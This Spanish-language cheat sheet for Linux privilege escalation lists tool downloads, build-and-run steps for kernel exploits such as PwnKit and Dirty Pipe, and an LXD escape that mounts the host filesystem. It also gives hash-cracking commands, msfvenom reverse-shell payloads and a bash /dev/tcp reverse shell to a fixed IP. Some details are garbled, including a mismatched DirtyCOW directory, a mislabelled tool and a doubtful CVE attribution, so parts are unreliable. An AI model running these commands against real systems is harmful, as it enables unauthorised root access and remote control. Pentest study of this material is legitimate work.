REFERENCIAS Y DESCARGAS - Linux Privilege Escalation
Herramientas de Enumeración
linpeas.sh
- GitHub: https://github.com/carlospolop/PEASS-ng
- Descargar directo: https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/linpeas.sh
- Alternativa: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
bash
wget https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/linpeas.sh
chmod +x linpeas.sh
./linpeas.shLinEnum
- GitHub: https://github.com/rebootuser/LinEnum
- Raw: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
bash
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.shLSE (Linux Exploit Suggester)
- GitHub: https://github.com/linted/lse
- Raw: https://raw.githubusercontent.com/linted/lse/master/lse.sh
bash
wget https://raw.githubusercontent.com/linted/lse/master/lse.sh
chmod +x lse.sh
./lse.sh -i allunix-privesc-check
- Website: http://pentestmonkey.net/tools/unix-privesc-check/
- Descarga: http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.6.tar.gz
bash
wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.6.tar.gz
tar -xzf unix-privesc-check-1.4.6.tar.gz
cd unix-privesc-check-1.4.6
./unix-privesc-check standardpspy (Process Spying)
- GitHub: https://github.com/DominicBreuker/pspy
- Releases: https://github.com/DominicBreuker/pspy/releases
- Descargar x64: https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
bash
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
./pspy64enum4linux
- GitHub: https://github.com/CiscoCXSecurity/enum4linux
- Instalación:
apt install enum4linux - Raw: https://raw.githubusercontent.com/CiscoCXSecurity/enum4linux/master/enum4linux.pl
bash
sudo apt install enum4linux
enum4linux -a 192.168.1.100Herramientas de Escalación
DirtyCOW (CVE-2016-5195)
- GitHub: https://github.com/dirtycow/dirtycow.github.io
- PoC: https://github.com/xairy/kernel-exploits/blob/master/CVE-2016-5195/cow_shell.c
bash
git clone https://github.com/dirtycow/dirtycow.github.io
cd dirtycow
make
./dirtyc0w /etc/passwdPwnKit (CVE-2021-4034)
- GitHub: https://github.com/berdav/CVE-2021-4034
- Directo: git clone https://github.com/berdav/CVE-2021-4034.git
bash
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034
make
./cve-2021-4034Dirty Pipe (CVE-2022-0847)
- GitHub: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
- PoC: Múltiples PoCs disponibles
bash
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
cd CVE-2022-0847-DirtyPipe-Exploits
gcc -o exploit exploit.c
./exploiteBPF Exploit (CVE-2021-3439)
- GitHub: https://github.com/exploit-db/ebpf-exploit
- Searchsploit:
searchsploit CVE-2021-3439
bash
gcc -O2 -target bpf -c exploit.c -o exploit.oCVE-2021-22555 (Netfilter)
- GitHub: https://github.com/v1s1t0r1sh3r3/kernel_exploits
- Searchsploit:
searchsploit CVE-2021-22555
bash
searchsploit CVE-2021-22555
searchsploit -m linux/kernel_exploits/51996.c
gcc -o exploit 51996.c
./exploitCVE-2022-34918 (Netfilter)
- GitHub: Buscar en kernel-exploits
- Searchsploit:
searchsploit CVE-2022-34918
bash
searchsploit CVE-2022-34918Meltdown / Spectre
- Meltdown: https://github.com/IAIK/meltdown
- Spectre: https://github.com/IAIK/spectre
bash
git clone https://github.com/IAIK/meltdown
cd meltdownLXD/LXC Privilege Escalation
- Alpine Builder: https://github.com/saghul/lxd-alpine-builder
- Releases: https://github.com/saghul/lxd-alpine-builder/releases
bash
wget https://github.com/saghul/lxd-alpine-builder/releases/download/v0.3/alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc image import alpine-*.tar.gz --alias alpine
lxc init alpine container -c security.privileged=true
lxc config device add container root disk source=/ path=/host
lxc start container
lxc exec container -- /bin/bashHerramientas de Post-Explotación
Mimikatz (para Windows ejecutándose en Linux)
- GitHub: https://github.com/gentilkiwi/mimikatz
- Para Linux nativo: N/A (Mimikatz es para Windows)
hashcat (Crackeo de contraseñas)
- Oficial: https://hashcat.net/hashcat/
- GitHub: https://github.com/hashcat/hashcat
bash
sudo apt install hashcat
hashcat -m 1800 -a 0 hashes.txt rockyou.txtjohn (John the Ripper)
- Oficial: https://www.openwall.com/john/
- GitHub: https://github.com/openwall/john
bash
sudo apt install john
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txtGTFOBins para Linux
- Sitio: https://gtfobins.github.io
- Búsqueda de técnicas de escape
Herramientas de Transferencia
nc.exe / nc (Netcat)
- Linux:
sudo apt install netcat - GitHub: https://github.com/int0x33/nc.exe (versión Windows)
bash
sudo apt install netcat
nc -lvp 4444wget / curl
- Preinstalados en Linux
bash
wget http://192.168.1.100/exploit
curl -O http://192.168.1.100/exploitscp
- SSH Copy
bash
scp usuario@objetivo:/tmp/archivo .
scp archivo usuario@objetivo:/tmp/Python HTTP Server
- Incluido en Python
bash
python3 -m http.server 8000
wget http://kali:8000/archivoHerramientas de Análisis
Searchsploit
- Parte de: Exploit Database
- GitHub: https://github.com/offensive-security/exploitdb
- Instalación en Kali: Preinstalado
bash
searchsploit "Linux Kernel" 5.10
searchsploit -m 50123
searchsploit --updateExploitation Framework - Metasploit
bash
msfconsole
use exploit/linux/...ExploitDB
- Web: https://www.exploit-db.com/
- Descarga de exploits: Búsqueda y descarga manual
Herramientas de Scripting
msfvenom (Generador de Payloads)
- Incluido en: Metasploit Framework
- Preinstalado en Kali
bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elfpwntools
- GitHub: https://github.com/Gallopsled/pwntools
- Instalación:
pip install pwntools
bash
pip3 install pwntools
python3 script.pyReverse Shell Generator
bash
# Generar shells inversos online
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1Referencias Oficiales
LOLBINS (Living Off The Land Binaries)
GTFOBins
Kernel Exploit Database
Priv2Admin
- GitHub: https://github.com/gtworek/Priv2Admin
- Análisis de privilegios peligrosos
PayloadsAllTheThings
- GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
- Técnicas de Linux privesc
Instalación Rápida en Kali
bash
# Actualizar
sudo apt update && sudo apt upgrade -y
# Herramientas de pentesting
sudo apt install -y git wget curl netcat nmap metasploit-framework
sudo apt install -y python3-pip python3-dev
sudo apt install -y gcc g++ make binutils gdb
# Tools específicas
sudo apt install -y enum4linux john hashcat
sudo apt install -y wget curl openssh-client
# Python packages
pip3 install pwntools pycryptodome impacket
# Clonar repos importantes
git clone https://github.com/carlospolop/PEASS-ng.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/v1s1t0r1sh3r3/kernel_exploits.git
git clone https://github.com/SecWiki/linux-kernel-exploits.git
# Descargar herramientas
chmod +x PEASS-ng/linPEAS/linpeas.sh
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
wget https://raw.githubusercontent.com/linted/lse/master/lse.shBúsqueda de Exploits Específicos
Por CVE
bash
# En Kali
searchsploit CVE-2021-4034
searchsploit CVE-2022-0847
searchsploit CVE-2021-22555
# Online
https://www.exploit-db.com/search?q=CVE-2021-4034Por Versión de Kernel
bash
uname -r
searchsploit "Linux Kernel" 5.10
searchsploit "Ubuntu" 20.04Por Versión de SO
bash
cat /etc/os-release
lsb_release -a
searchsploit "Debian" 10
searchsploit "CentOS" 8